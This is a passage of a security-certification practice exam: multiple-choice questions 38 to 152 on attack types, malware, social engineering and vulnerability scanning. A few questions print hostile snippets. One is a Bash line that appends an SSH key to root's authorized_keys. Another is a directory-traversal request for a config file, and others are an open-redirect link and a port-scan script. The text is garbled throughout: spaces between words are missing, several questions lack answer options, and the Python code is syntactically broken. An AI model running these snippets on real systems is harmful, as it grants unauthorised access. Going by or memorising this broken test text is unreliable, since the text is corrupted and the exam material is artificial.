38. WhyisSSLstrippingaparticulardangerwithopenWi-Finetworks?

A. WPA2isnotsecureenoughtopreventthis.

B. Openhotspotsdonotasserttheiridentityinasecureway.

C. Openhotspotscanbeaccessedbyanyuser.

D. 802.11acisinsecureandtrafficcanberedirected.

39. Asalesmanageratyourcompanyiscomplainingaboutslowperformanceonhiscomputer.Whenyouthoroughlyinvestigatetheissue,youfindspywareonhiscomputer.Heinsiststhattheonlythinghehasdownloadedrecentlywasafreewarestocktradingapplication.Whatwouldbestexplainthissituation?

A. Logicbomb

B. Trojanhorse

C. Rootkit

D. Macrovirus

40. Whenphishingattacksaresofocusedthattheytargetaspecifichigh-rankingorimportantindividual,theyarecalledwhat?

A. Spearphishing

B. Targetedphishing

C. Phishing

D. Whaling

41. Whattypeofthreatactorsaremostlikelytohaveaprofitmotivefortheirmaliciousactivities?

A. Stateactors

B. Scriptkiddies

C. Hacktivists

D. Criminalsyndicates

42. Oneofyouruserscannotrecallthepasswordfortheirlaptop.Youwanttorecoverthatpasswordforthem.Youintendtouseatool/techniquethatispopularwithhackers,anditconsistsofsearchingtablesofprecomputed


hashestorecoverthepassword.Whatbestdescribesthis?

A. Rainbowtable

B. Backdoor

C. Socialengineering

D. Dictionaryattack

43. Whatriskiscommonlyassociatedwithalackofvendorsupportforaproduct,suchasanoutdatedversionofadevice?

A. Improperdatastorage

B. Lackofpatchesorupdates

C. Lackofavailabledocumentation

D. Systemintegrationandconfigurationissues

44. Youhavenoticedthatwheninacrowdedarea,yousometimesgetastreamofunwantedtextmessages.Themessagesendwhenyouleavethearea.Whatdescribesthisattack?

A. Bluejacking

B. Bluesnarfing

C. Eviltwin

D. Rogueaccesspoint

45. Dennisusesanon-pathattacktocauseasystemtosendHTTPStraffictohissystemandthenforwardsittotheactualserverthetrafficisintendedfor.Whattypeofpasswordattackcanheconductwiththedatahegathersifhecapturesallthetrafficfromaloginform?

A. Aplain-textpasswordattack

B. Apass-the-hashattack

C. ASQLinjectionattack

D. Across-sitescriptingattack

46. Someonehasbeenrummagingthroughyourcompany'strashbinsseekingtofinddocuments,diagrams,orothersensitiveinformationthathasbeenthrownout.Whatisthiscalled?

A. Dumpsterdiving


B. Trashdiving

C. Socialengineering

D. Trashengineering

47. Louisisinvestigatingamalwareincidentononeofthecomputersonhisnetwork.Hehasdiscoveredunknownsoftwarethatseemstobeopeningaport,allowingsomeonetoremotelyconnecttothecomputer.Thissoftwareseemstohavebeeninstalledatthesametimeasasmallsharewareapplication.Whichofthefollowingbestdescribesthismalware?

A. RAT

B. Worm

C. Logicbomb

D. Rootkit

48. Jaredisresponsiblefornetworksecurityathiscompany.Hehasdiscoveredbehaviorononecomputerthatcertainlyappearstobeavirus.Hehasevenidentifiedafilehethinksmightbethevirus.However,usingthreeseparateantivirusprograms,hefindsthatnonecandetectthefile.Whichofthefollowingismostlikelytobeoccurring?

A. ThecomputerhasaRAT.

B. Thecomputerhasazero-dayexploit.

C. Thecomputerhasaworm.

D. Thecomputerhasarootkit.

49. WhichofthefollowingisnotacommonmeansofattackingRFIDbadges?

A. Datacapture

B. Spoofing

C. Denial-of-service

D. Birthdayattacks

50. Yourwirelessnetworkhasbeenbreached.Itappearstheattackermodifiedaportionofdatausedwiththestreamcipherandusedthistoexposewirelesslyencrypteddata.Whatisthisattackcalled?

A. Eviltwin


B. RogueWAP

C. IVattack

D. WPSattack

51. ThecompanythatScottworksforhasexperiencedadatabreach,andthepersonalinformationofthousandsofcustomershasbeenexposed.Whichofthefollowingimpactcategoriesisnotaconcernasdescribedinthisscenario?

A. Financial

B. Reputation

C. Availabilityloss

D. Dataloss

52. Whattypeofattackexploitsthetrustthatawebsitehasforanauthenticatedusertoattackthatwebsitebyspoofingrequestsfromthetrusteduser?



C. Bluejacking

D. Eviltwin

53. Whatpurposedoesafusioncenterserveincyberintelligenceactivities?

A. Itpromotesinformationsharingbetweenagenciesororganizations.

B. Itcombinessecuritytechnologiestocreatenew,morepowerfultools.

C. Itgeneratespowerforthelocalcommunityinasecureway.

D. Itseparatesinformationbyclassificationratingstoavoidaccidentaldistribution.

54. CVEisanexampleofwhattypeoffeed?

A. Athreatintelligencefeed

B. Avulnerabilityfeed

C. Acriticalinfrastructurelistingfeed

D. Acriticalvirtualizationexploitsfeed

55. Whattypeofattackisabirthdayattack?


A. Asocialengineeringattack

B. Acryptographicattack

C. Anetworkdenial-of-serviceattack

D. ATCP/IPprotocolattack

56. JuanitaisanetworkadministratorforAcmeCompany.Someuserscomplainthattheykeepgettingdroppedfromthenetwork.WhenJuanitachecksthelogsforthewirelessaccesspoint(WAP),shefindsthatadeauthenticationpackethasbeensenttotheWAPfromtheusers'IPaddresses.Whatseemstobehappeninghere?

A. Problemwithusers'Wi-Ficonfiguration

B. Disassociationattack

C. Sessionhijacking

D. Backdoorattack

57. Johnhasdiscoveredthatanattackeristryingtogetnetworkpasswordsbyusingsoftwarethatattemptsanumberofpasswordsfromalistofcommonpasswords.Whattypeofattackisthis?

A. Dictionary

B. Rainbowtable

C. Bruteforce

D. Sessionhijacking

58. Youareanetworksecurityadministratorforabank.YoudiscoverthatanattackerhasexploitedaflawinOpenSSLandforcedsomeconnectionstomovetoaweakciphersuiteversionofTLS,whichtheattackercouldbreach.Whattypeofattackwasthis?

A. Disassociationattack

B. Downgradeattack

C. Sessionhijacking

D. Bruteforce

59. Whenanattackertriestofindaninputvaluethatwillproducethesamehashasapassword,whattypeofattackisthis?


A. Rainbowtable

B. Bruteforce

C. Sessionhijacking

D. Collisionattack

60. Farèsisthenetworksecurityadministratorforacompanythatcreatesadvancedroutersandswitches.Hehasdiscoveredthathiscompany'snetworkshavebeensubjectedtoaseriesofadvancedattacksoveraperiodoftime.Whatbestdescribesthisattack?

A. DDoS

B. Bruteforce

C. APT

D. Disassociationattack

61. Whattypeofinformationisphishingnotcommonlyintendedtoacquire?

A. Passwords

B. Emailaddresses

C. Creditcardnumbers

D. Personalinformation

62. JohnisrunninganIDSonhisnetwork.UserssometimesreportthattheIDSflagslegitimatetrafficasanattack.Whatdescribesthis?

A. Falsepositive

B. Falsenegative

C. Falsetrigger

D. Falseflag

63. Scottdiscoversthatmalwarehasbeeninstalledononeofthesystemsheisresponsiblefor.Shortlyafterwardpasswordsusedbytheuserthatthesystemisassignedtoarediscoveredtobeinusebyattackers.WhattypeofmaliciousprogramshouldScottlookforonthecompromisedsystem?

A. Arootkit

B. Akeylogger


C. Aworm

D. Noneoftheabove

64. Youareperformingapenetrationtestofyourcompany'snetwork.Aspartofthetest,youwillbegivenaloginwithminimalaccessandwillattempttogainadministrativeaccesswiththisaccount.Whatisthiscalled?

A. Privilegeescalation

B. Sessionhijacking

C. Rootgrabbing

D. Climbing

65. MattdiscoversthatasystemonhisnetworkissendinghundredsofEthernetframestotheswitchitisconnectedto,witheachframecontainingadifferentsourceMACaddress.Whattypeofattackhashediscovered?

A. Etherspam

B. MACflooding

C. Hardwarespoofing

D. MAChashing

66. Spywareisanexampleofwhattypeofmalware?

A. Trojan

B. PUP

C. RAT

D. Ransomware

67. Maryhasdiscoveredthatawebapplicationusedbyhercompanydoesnotalwayshandlemultithreadingproperly,particularlywhenmultiplethreadsaccessthesamevariable.Thiscouldallowanattackerwhodiscoveredthisvulnerabilitytoexploititandcrashtheserver.WhattypeoferrorhasMarydiscovered?

A. Bufferoverflow

B. Logicbomb

C. Raceconditions

D. Impropererrorhandling


68. Anattackeristryingtogetaccesstoyournetwork.Heissendingusersonyournetworkalinktoanewgamewithahackedlicensecodeprogram.However,thegamefilesalsoincludesoftwarethatwillgivetheattackeraccesstoanymachinethatitisinstalledon.Whattypeofattackisthis?

A. Rootkit

B. Trojanhorse

C. Spyware

D. Bootsectorvirus

69. ThefollowingimageshowsareportfromanOpenVASsystem.Whattypeofweakconfigurationisshownhere?

A. Weakencryption

B. Unsecuredadministrativeaccounts

C. Openportsandservices

D. Unsecureprotocols

70. Whileconductingapenetrationtest,Anniescansforsystemsonthenetworkshehasgainedaccessto.Shediscoversanothersystemwithinthesamenetworkthathasthesameaccountsandusertypesastheonesheison.Sinceshealreadyhasavaliduseraccountonthesystemshehasalreadyaccessed,sheisabletologintoit.Whattypeoftechniqueisthis?


A. Lateralmovement

B. Privilegeescalation

C. Privilegeretention

D. Verticalmovement

71. AmandascansaRedHatLinuxserverthatshebelievesisfullypatchedanddiscoversthattheApacheversionontheserverisreportedasvulnerabletoanexploitfromafewmonthsago.Whenshecheckstoseeifsheismissingpatches,Apacheisfullypatched.Whathasoccurred?

A. Afalsepositive

B. Anautomaticupdatefailure

C. Afalsenegative

D. AnApacheversionmismatch

72. Whenaprogramhasvariables,especiallyarrays,anddoesnotchecktheboundaryvaluesbeforeinputtingdata,whatattackistheprogramvulnerableto?

A. XSS

B. CSRF

C. Bufferoverflow

D. Logicbomb

73. Tracyisconcernedthatthesoftwareshewantstodownloadmaynotbetrustworthy,soshesearchesforitandfindsmanypostingsclaimingthatthesoftwareislegitimate.Ifsheinstallsthesoftwareandlaterdiscoversitismaliciousandthatmaliciousactorshaveplantedthosereviews,whatprincipleofsocialengineeringhavetheyused?

A. Scarcity

B. Familiarity

C. Consensus

D. Trust

74. Whichofthefollowingbestdescribesmalwarethatwillexecutesomemaliciousactivitywhenaparticularconditionismet(i.e.,iftheconditionis


met,thenexecuted)?

A. Bootsectorvirus

B. Logicbomb

C. Bufferoverflow

D. Sparseinfectorvirus

75. Whattermdescribesusingconversationaltacticsaspartofasocialengineeringexercisetoextractinformationfromtargets?

A. Pretexting

B. Elicitation

C. Impersonation

D. Intimidation

76. Telnet,RSH,andFTPareallexamplesofwhat?

A. Filetransferprotocols

B. Unsecureprotocols

C. Coreprotocols

D. Openports

77. Scottwantstodeterminewhereanorganization'swirelessnetworkcanbeaccessedfrom.Whattestingtechniquesarehismostlikelyoptions?

A. OSINTandactivescans

B. Wardrivingandwarflying

C. Socialengineeringandactivescans

D. OSINTandwardriving

78. Geraldisanetworkadministratorforasmallfinancialservicescompany.Usersarereportingoddbehaviorthatappearstobecausedbyavirusontheirmachines.Afterisolatingthemachinesthathebelievesareinfected,Geraldanalyzesthem.Hefindsthatalltheinfectedmachinesreceivedanemailpurportingtobefromaccounting,withanExcelspreadsheet,andtheusersopenedthespreadsheet.Whatisthemostlikelyissueonthesemachines?

A. Amacrovirus


B. Abootsectorvirus

C. ATrojanhorse

D. ARAT

79. Yourcompanyhashiredanoutsidesecurityfirmtoperformvarioustestsofyournetwork.Duringthevulnerabilityscan,youwillprovidethatcompanywithloginsforvarioussystems(i.e.,databaseserver,applicationserver,webserver,etc.)toaidintheirscan.Whatbestdescribesthis?

A. Aknownenvironmenttest

B. Agray-boxtest

C. Acredentialedscan

D. Anintrusivescan

80. Stevediscoversthefollowingcodeonasystem.Whatlanguageisitwrittenin,andwhatdoesitdo?

importsocketasskt

forportinrange(1,9999):

try:

sc=skt.socket(askt.AF_INET,skt.SOCK_STREAM)

sc.settimeout(900)

sc.connect(('127.0.0.1,port))

print'%d:OPEN'%(port)

sc.close

except:continue

A. Perl,vulnerabilityscanning

B. Python,portscanning

C. Bash,vulnerabilityscanning

D. PowerShell,portscanning

81. Whichofthefollowingiscommonlyusedinadistributeddenial-of-service(DDoS)attack?

A. Phishing

B. Adware

C. Botnet


D. Trojan

82. Amandadiscoversthatamemberofherorganization'sstaffhasinstalledaremoteaccessTrojanontheiraccountingsoftwareserverandhasbeenaccessingitremotely.Whattypeofthreathasshediscovered?

A. Zero-day

B. Insiderthreat

C. Misconfiguration

D. Weakencryption

83. PostingsfromRussianagentsduringthe2016U.S.presidentialcampaigntoFacebookandTwitterareanexampleofwhattypeofeffort?

A. Impersonation

B. Asocialmediainfluencecampaign

C. Asymmetricwarfare

D. Awateringholeattack

84. Juanisresponsibleforincidentresponseatalargefinancialinstitution.HediscoversthatthecompanyWi-Fihasbeenbreached.Theattackerusedthesamelogincredentialsthatshipwiththewirelessaccesspoint(WAP).TheattackerwasabletousethosecredentialstoaccesstheWAPadministrativeconsoleandmakechanges.Whichofthefollowingbestdescribeswhatcausedthisvulnerabilitytoexist?

A. Improperlyconfiguredaccounts

B. Untrainedusers

C. Usingdefaultsettings

D. Failuretopatchsystems

85. Elizabethisinvestigatinganetworkbreachathercompany.Shediscoversaprogramthatwasabletoexecutecodewithintheaddressspaceofanotherprocessbyusingthetargetprocesstoloadaspecificlibrary.Whatbestdescribesthisattack?

A. Logicbomb

B. Sessionhijacking


C. Bufferoverflow

D. DLLinjection

86. Whichofthefollowingthreatactorsismostlikelytobeassociatedwithanadvancedpersistentthreat(APT)?

A. Hacktivists

B. Stateactors

C. Scriptkiddies

D. Insiderthreats

87. Whatistheprimarydifferencebetweenanintrusiveandanonintrusivevulnerabilityscan?

A. Anintrusivescanisapenetrationtest.

B. Anonintrusivescanisjustadocumentcheck.

C. Anintrusivescancouldpotentiallydisruptoperations.

D. Anonintrusivescanwon'tfindmostvulnerabilities.

88. Yourcompanyoutsourceddevelopmentofanaccountingapplicationtoalocalprogrammingfirm.Afterthreemonthsofusingtheproduct,oneofyouradministratorsdiscoversthatthedevelopershaveinsertedawaytologinandbypassallsecurityandauthentication.Whatbestdescribesthis?

A. Logicbomb

B. Trojanhorse

C. Backdoor

D. Rootkit

89. Darylisinvestigatingarecentbreachofhiscompany'swebserver.Theattackerusedsophisticatedtechniquesandthendefacedthewebsite,leavingmessagesthatweredenouncingthecompany'spublicpolicies.Heandhisteamaretryingtodeterminethetypeofactorwhomostlikelycommittedthebreach.Basedontheinformationprovided,whowasthemostlikelythreatactor?

A. Ascript

B. Anation-state


C. Organizedcrime

D. Hacktivists

90. Whattwotechniquesaremostcommonlyassociatedwithapharmingattack?

A. ModifyingthehostsfileonaPCorexploitingaDNSvulnerabilityonatrustedDNSserver

B. Phishingmanyusersandharvestingemailaddressesfromthem

C. Phishingmanyusersandharvestingmanypasswordsfromthem

D. SpoofingDNSserverIPaddressesormodifyingthehostsfileonaPC

91. Angelareviewstheauthenticationlogsforherwebsiteandseesattemptsfrommanydifferentaccountsusingthesamesetofpasswords.Whatisthisattacktechniquecalled?

A. Bruteforcing

B. Passwordspraying

C. Limitedloginattacks

D. Accountspinning

92. Wheninvestigatingbreachesandattemptingtoattributethemtospecificthreatactors,whichofthefollowingisnotoneoftheindicatorsofanAPT?

A. Long-termaccesstothetarget

B. Sophisticatedattacks

C. TheattackcomesfromaforeignIPaddress.

D. Theattackissustainedovertime.

93. Charlesdiscoversthatanattackerhasusedavulnerabilityinawebapplicationthathiscompanyrunsandhasthenusedthatexploittoobtainrootprivilegesonthewebserver.Whattypeofattackhashediscovered?



C. ASQLinjection

D. Aracecondition


94. Whattypeofattackusesasecondwirelessaccesspoint(WAP)thatbroadcaststhesameSSIDasalegitimateaccesspoint,inanattempttogetuserstoconnecttotheattacker'sWAP?

A. Eviltwin

B. IPspoofing

C. Trojanhorse


95. Whichofthefollowingbestdescribesazero-dayvulnerability?

A. Avulnerabilitythatthevendorisnotyetawareof

B. Avulnerabilitythathasnotyetbeenbreached

C. Avulnerabilitythatcanbequicklyexploited(i.e.,inzerodays)

D. Avulnerabilitythatwillgivetheattackerbriefaccess(i.e.,zerodays)

96. Whattypeofattackinvolvesaddinganexpressionorphrasesuchasadding“SAFE”tomailheaders?

A. Pretexting

B. Phishing

C. SQLinjection

D. Prepending

97. Charleswantstoensurethathisoutsourcedcodedevelopmenteffortsareassecureaspossible.Whichofthefollowingisnotacommonpracticetoensuresecureremotecodedevelopment?

A. Ensuredevelopersaretrainedonsecurecodingtechniques.

B. Setdefinedacceptancecriteriaforcodesecurity.

C. Testcodeusingautomatedandmanualsecuritytestingsystems.

D. Auditallunderlyinglibrariesusedinthecode.

98. Youhavediscoveredthatthereareentriesinyournetwork'sdomainnameserverthatpointlegitimatedomainstounknownandpotentiallyharmfulIPaddresses.Whatbestdescribesthistypeofattack?

A. Abackdoor


B. AnAPT

C. DNSpoisoning

D. ATrojanhorse

99. Spywareisanexampleofwhattypeofmalicioussoftware?

A. ACAT

B. Aworm

C. APUP

D. ATrojan

100. Whatbestdescribesanattackthatattachessomemalwaretoalegitimateprogramsothatwhentheuserinstallsthelegitimateprogram,theyinadvertentlyinstallthemalware?

A. Backdoor

B. Trojanhorse

C. RAT

D. Polymorphicvirus

101. Whichofthefollowingbestdescribessoftwarethatwillprovidetheattackerwithremoteaccesstothevictim'smachinebutthatiswrappedwithalegitimateprograminanattempttotrickthevictimintoinstallingit?

A. RAT

B. Backdoor

C. Trojanhorse

D. Macrovirus

102. Whatprocesstypicallyoccursbeforecardcloningattacksoccur?

A. Abrute-forceattack

B. Askimmingattack

C. Arainbowtableattack

D. Abirthdayattack

103. Whichofthefollowingisanattackthatseekstoattackawebsite,basedonthewebsite'strustofanauthenticateduser?


A. XSS

B. XSRF

C. Bufferoverflow

D. RAT

104. Valerieisresponsibleforsecuritytestingapplicationsinhercompany.Shehasdiscoveredthatawebapplication,undercertainconditions,cangenerateamemoryleak.Whattypeofattackwouldthisleavetheapplicationvulnerableto?

A. DoS

B. Backdoor

C. SQLinjection

D. Bufferoverflow

105. ThemobilegamethatJackhasspentthelastyeardevelopinghasbeenreleased,andmaliciousactorsaresendingtraffictotheserverthatrunsittopreventitfromcompetingwithothergamesintheAppStore.Whattypeofdenial-of-serviceattackisthis?

A. AnetworkDDoS

B. AnoperationaltechnologyDDoS

C. AGDoS

D. AnapplicationDDoS

106. Charleshasbeentaskedwithbuildingateamthatcombinestechniquesfromattackersanddefenderstohelpprotecthisorganization.Whattypeofteamishebuilding?

A. Aredteam

B. Ablueteam

C. Awhiteteam

D. Apurpleteam

107. Mikeisanetworkadministratorwithasmallfinancialservicescompany.Hehasreceivedapop-upwindowthatstateshisfilesarenowencryptedandhemustpay.5bitcoinstogetthemdecrypted.Hetriestocheckthe


filesinquestion,buttheirextensionshavechanged,andhecannotopenthem.Whatbestdescribesthissituation?

A. Mike'smachinehasarootkit.

B. Mike'smachinehasransomware.

C. Mike'smachinehasalogicbomb.

D. Mike'smachinehasbeenthetargetofwhaling.

108. Whenamultithreadedapplicationdoesnotproperlyhandlevariousthreadsaccessingacommonvalue,andonethreadcanchangethedatawhileanotherthreadisrelyingonit,whatflawisthis?

A. Memoryleak

B. Bufferoverflow

C. Integeroverflow

D. Timeofcheck/timeofuse

109. AcmeCompanyisusingsmartcardsthatusenear-fieldcommunication(NFC)ratherthanneedingtobeswiped.Thisismeanttomakephysicalaccesstosecureareasmoresecure.Whatvulnerabilitymightthisalsocreate?

A. Tailgating

B. Eavesdropping

C. IPspoofing

D. Raceconditions

110. RickbelievesthatWindowssystemsinhisorganizationarebeingtargetedbyfilelessviruses.Ifhewantstocaptureartifactsoftheirinfectionprocess,whichofthefollowingoptionsismostlikelytoprovidehimwithaviewintowhattheyaredoing?

A. Reviewingfull-diskimagesofinfectedmachines

B. TurningonPowerShelllogging

C. Disablingtheadministrativeuseraccount

D. AnalyzingWindowscrashdumpfiles

111. Johnisresponsibleforphysicalsecurityatalargemanufacturingplant.


Employeesalluseasmartcardinordertoopenthefrontdoorandenterthefacility.Whichofthefollowingisacommonwayattackerswouldcircumventthissystem?

A. Phishing

B. Tailgating

C. Spoofingthesmartcard

D. RFIDspoofing

112. AdamwantstodownloadlistsofmaliciousoruntrustworthyIPaddressesanddomainsusingSTIXandTAXII.Whattypeofserviceishelookingfor?

A. Avulnerabilityfeed

B. Athreatfeed

C. Ahuntingfeed

D. Arulefeed

113. Duringanincidentinvestigation,Naominoticesthatasecondkeyboardwaspluggedintoasysteminapublicareaofhercompany'sbuilding.Shortlyafterthatevent,thesystemwasinfectedwithmalware,resultinginadatabreach.WhatshouldNaomilookforinherin-personinvestigation?

A. ATrojanhorsedownload

B. AmaliciousUSBcableordrive

C. Aworm

D. Noneoftheabove

114. YouareresponsibleforincidentresponseatAcmeCorporation.YouhavediscoveredthatsomeonehasbeenabletocircumventtheWindowsauthenticationprocessforaspecificnetworkapplication.Itappearsthattheattackertookthestoredhashofthepasswordandsentitdirectlytothebackendauthenticationservice,bypassingtheapplication.Whattypeofattackisthis?

A. Hashspoofing

B. Eviltwin

C. Shimming


D. Passthehash

115. Auserinyourcompanyreportsthatshereceivedacallfromsomeoneclaimingtobefromthecompanytechnicalsupportteam.Thecallerstatedthattherewasavirusspreadingthroughthecompanyandtheyneededimmediateaccesstotheemployee'scomputertostopitfrombeinginfected.Whatsocial-engineeringprinciplesdidthecallerusetotrytotricktheemployee?

A. Urgencyandintimidation

B. Urgencyandauthority

C. Authorityandtrust

D. Intimidationandauthority

116. Afterrunningavulnerabilityscan,ElainediscoversthattheWindows10workstationsinhercompany'swarehousearevulnerabletomultipleknownWindowsexploits.Whatshouldsheidentifyastherootcauseinherreporttomanagement?

A. Unsupportedoperatingsystems

B. Improperorweakpatchmanagementfortheoperatingsystems

C. Improperorweakpatchmanagementforthefirmwareofthesystems

D. Useofunsecureprotocols

117. AhmedhasdiscoveredthatattackersspoofedIPaddressestocausethemtoresolvetoadifferenthardwareaddress.Themanipulationhaschangedthetablesmaintainedbythedefaultgatewayforthelocalnetwork,causingdatadestinedforonespecificMACaddresstonowberoutedelsewhere.Whattypeofattackisthis?

A. ARPpoisoning

B. DNSpoisoning

C. On-pathattack

D. Backdoor

118. Whattypeofpenetrationtestisbeingdonewhenthetesterisgivenextensiveknowledgeofthetargetnetwork?

A. Knownenvironment


B. Fulldisclosure

C. Unknownenvironment

D. Redteam

119. Yourcompanyisinstitutinganewsecurityawarenessprogram.Youareresponsibleforeducatingendusersonavarietyofthreats,includingsocialengineering.Whichofthefollowingbestdefinessocialengineering?

A. Illegalcopyingofsoftware

B. Gatheringinformationfromdiscardedmanualsandprintouts

C. Usingpeopleskillstoobtainproprietaryinformation

D. Phishingemails

120. Whichofthefollowingattackscanbecausedbyauserbeingunawareoftheirphysicalsurroundings?

A. ARPpoisoning

B. Phishing

C. Shouldersurfing

D. Smurfattack

121. Whatarethetwomostcommongoalsofinvoicescams?

A. Receivingmoneyoracquiringcredentials

B. Acquiringcredentialsordeliveringarootkit

C. Receivingmoneyorstealingcryptocurrency

D. Acquiringcredentialsordeliveringransomware

122. Whichofthefollowingtypeoftestingusesanautomatedprocessofproactivelyidentifyingvulnerabilitiesofthecomputingsystemspresentonanetwork?

A. Securityaudit

B. Vulnerabilityscanning

C. Aknownenvironmenttest

D. Anunknownenvironmenttest

123. Johnhasbeenaskedtodoapenetrationtestofacompany.Hehasbeen


givengeneralinformationbutnodetailsaboutthenetwork.Whatkindoftestisthis?

A. Partiallyknownenvironment

B. Knownenvironment

C. Unknownenvironment

D. Masked

124. Underwhichtypeofattackdoesanattacker'ssystemappeartobetheservertotherealclientandappeartobetheclienttotherealserver?

A. Denial-of-service

B. Replay

C. Eavesdropping

D. On-path

125. YouareasecurityadministratorforAcmeCorporation.Youhavediscoveredmalwareonsomeofyourcompany'smachines.Thismalwareseemstointerceptcallsfromthewebbrowsertolibraries,andthenmanipulatesthebrowsercalls.Whattypeofattackisthis?

A. Maninthebrowser

B. On-pathattack

C. Bufferoverflow

D. Sessionhijacking

126. Tonyisreviewingawebapplicationanddiscoversthewebsitegenerateslinkslikethefollowing:

https://www.example.com/login.html?

Relay=http%3A%2F%2Fexample.com%2Fsite.html

Whattypeofvulnerabilityisthiscodemostlikelytobesusceptibleto?

A. SQLinjection

B. URLredirection

C. DNSpoisoning

D. LDAPinjection


https://www.example.com/login.html?Relay=http%3A%2F%2Fexample.com%2Fsite.html

127. YouareresponsibleforsoftwaretestingatAcmeCorporation.Youwanttocheckallsoftwareforbugsthatmightbeusedbyanattackertogainentranceintothesoftwareoryournetwork.Youhavediscoveredawebapplicationthatwouldallowausertoattempttoputa64-bitvalueintoa4-byteintegervariable.Whatisthistypeofflaw?

A. Memoryoverflow

B. Bufferoverflow

C. Variableoverflow

D. Integeroverflow

128. AngelahasdiscoveredanattackagainstsomeoftheusersofherwebsitethatleverageURLparametersandcookiestomakelegitimateusersperformunwantedactions.Whattypeofattackhasshemostlikelydiscovered?

A. SQLinjection


C. LDAPinjection

D. Cross-sitescripting

129. Nathandiscoversthefollowingcodeinthedirectoryofacompromiseduser.Whatlanguageisitusing,andwhatwillitdo?

echo"ssh-rsaABBAB4KAE9sdafAK…Mq/jc5YLfnAnbFDRABMhuWzaWUp

root@localhost">>/root/.ssh/authorized_keys

A. Python,addsanauthorizedSSHkey

B. Bash,connectstoanothersystemusinganSSHkey

C. Python,connectstoanothersystemusinganSSHkey

D. Bash,addsanauthorizedSSHkey

130. Jaredhasdiscoveredmalwareontheworkstationsofseveralusers.Thisparticularmalwareprovidesadministrativeprivilegesfortheworkstationtoanexternalhacker.Whatbestdescribesthismalware?

A. Trojanhorse

B. Logicbomb

C. Multipartitevirus


D. Rootkit

131. Whyarememoryleaksapotentialsecurityissue?

A. Theycanexposesensitivedata.

B. Theycanallowattackerstoinjectcodeviatheleak.

C. Theycancausecrashes

D. Noneoftheabove

132. MichellediscoversthatanumberofsystemsthroughoutherorganizationareconnectingtoachangingsetofremotesystemsonTCPport6667.Whatisthemostlikelycauseofthis,ifshebelievesthetrafficisnotlegitimate?

A. Analternateserviceportforwebtraffic

B. BotnetcommandandcontrolviaIRC

C. Downloadsviaapeer-to-peernetwork

D. RemoteaccessTrojans

133. Susanperformsavulnerabilityscanofasmallbusinessnetworkanddiscoversthattheorganization'sconsumer-gradewirelessrouterhasavulnerabilityinitswebserver.Whatissueshouldsheaddressinherfindings?

A. Firmwarepatchmanagement

B. Defaultconfigurationissues

C. Anunsecuredadministrativeaccount

D. Weakencryptionsettings

134. WhereisanRFIDattackmostlikelytooccuraspartofapenetrationtest?

A. Systemauthentication

B. Accessbadges

C. Webapplicationaccess

D. VPNlogins

135. Whattypeofphishingattackoccursviatextmessages?

A. Bluejacking

B. Smishing


C. Phonejacking

D. Textwhaling

136. Usersinyourcompanyreportsomeonehasbeencallingtheirextensionandclaimingtobedoingasurveyforalargevendor.Basedonthequestionsaskedinthesurvey,yoususpectthatthisisascamtoelicitinformationfromyourcompany'semployees.Whatbestdescribesthis?

A. Spearphishing

B. Vishing

C. Wardialing

D. Robocalling

137. Johnisanalyzingarecentmalwareinfectiononhiscompanynetwork.Hediscoversmalwarethatcanspreadrapidlyviavulnerablenetworkservicesanddoesnotrequireanyinteractionfromtheuser.Whatbestdescribesthismalware?

A. Worm

B. Virus

C. Logicbomb

D. Trojanhorse

138. Yourcompanyhasissuedsomenewsecuritydirectives.Oneofthesenewdirectivesisthatalldocumentsmustbeshreddedbeforebeingthrownout.Whattypeofattackisthistryingtoprevent?

A. Phishing

B. Dumpsterdiving

C. Shouldersurfing

D. On-pathattack

139. Whichofthefollowingisnotacommonpartofacleanupprocessafterapenetrationtest?

A. Removingallexecutablesandscriptsfromthecompromisedsystem

B. Restoringallrootkitstotheiroriginalsettingsonthesystem

C. Returningallsystemsettingsandapplicationconfigurationstotheir


originalconfigurations

D. Removinganyuseraccountscreatedduringthepenetrationtest

140. Youhavediscoveredthatsomeonehasbeentryingtologontoyourwebserver.Thepersonhastriedawiderangeoflikelypasswords.Whattypeofattackisthis?

A. Rainbowtable

B. Birthdayattack

C. Dictionaryattack

D. Spoofing

141. Jimdiscoversaphysicaldeviceattachedtoagaspump'screditcardreader.Whattypeofattackhashelikelydiscovered?

A. Areplayattack

B. Aracecondition

C. Askimmer

D. Acardcloner

142. Whatistheprimarydifferencebetweenactiveandpassivereconnaissance?

A. Activewillbedonemanually,passivewithtools.

B. Activeisdonewithblack-boxtestsandpassivewithwhite-boxtests.

C. Activeisusuallydonebyattackersandpassivebytesters.

D. Activewillactuallyconnecttothenetworkandcouldbedetected;passivewon't.

143. Abrowsertoolbarisanexampleofwhattypeofmalware?

A. Arootkit

B. ARAT

C. Aworm

D. APUP

144. Whattermdescribesdatathatiscollectedfrompubliclyavailablesourcesthatcanbeusedinanintelligencecontext?

A. OPSEC


B. OSINT

C. IntCon

D. STIX

145. Whattypeofattacktargetsaspecificgroupofusersbyinfectingoneormorewebsitesthatthatgroupisspecificallyknowntovisitfrequently?

A. Awatercoolerattack

B. Aphishingnetattack

C. Awateringholeattack

D. Aphishpondattack

146. TracyisconcernedaboutLDAPinjectionattacksagainstherdirectoryserver.WhichofthefollowingisnotacommontechniquetopreventLDAPinjectionattacks?

A. SecureconfigurationofLDAP

B. Userinputvalidation

C. LDAPqueryparameterization

D. Outputfilteringrules

147. FredusesaTorproxytobrowseforsitesaspartofhisthreatintelligence.WhattermisfrequentlyusedtodescribethispartoftheInternet?

A. Throughthelookingglass

B. Thedarkweb

C. Theunderweb

D. Onion-space

148. WhatbrowserfeatureisusedtohelppreventsuccessfulURLredirectionattacks?

A. Certificateexpirationtracking

B. DisplayingthefullrealURL

C. Disablingcookies

D. EnablingJavaScript

149. Whatisthemostsignificantdifferencebetweencloudservice-basedand


on-premisesvulnerabilities?

A. Yourabilitytoremediateityourself

B. Theseverityofthevulnerability

C. Thetimerequiredtoremediate

D. Yourresponsibilityforcompromiseddata

150. Christinarunsavulnerabilityscanofacustomernetworkanddiscoversthataconsumerwirelessrouteronthenetworkreturnsaresultreportingdefaultlogincredentials.Whatcommonconfigurationissuehassheencountered?

A. Anunpatcheddevice

B. Anoutofsupportdevice

C. Anunsecuredadministratoraccount

D. Anunsecureduseraccount

151. Whattypeofteamisusedtotestsecuritybyusingtoolsandtechniquesthatanactualattackerwoulduse?

A. Aredteam

B. Ablueteam

C. Awhiteteam

D. Apurpleteam

152. Whilereviewingweblogsforherorganization'swebsiteKathleendiscoverstheentryshownhere:

GEThttp://example.com/viewarticle.php?view=../../../config.txt

HTTP/1.1

Whattypeofattackhasshepotentiallydiscovered?

A. Adirectorytraversalattacks

B. Awebapplicationbufferoverflow

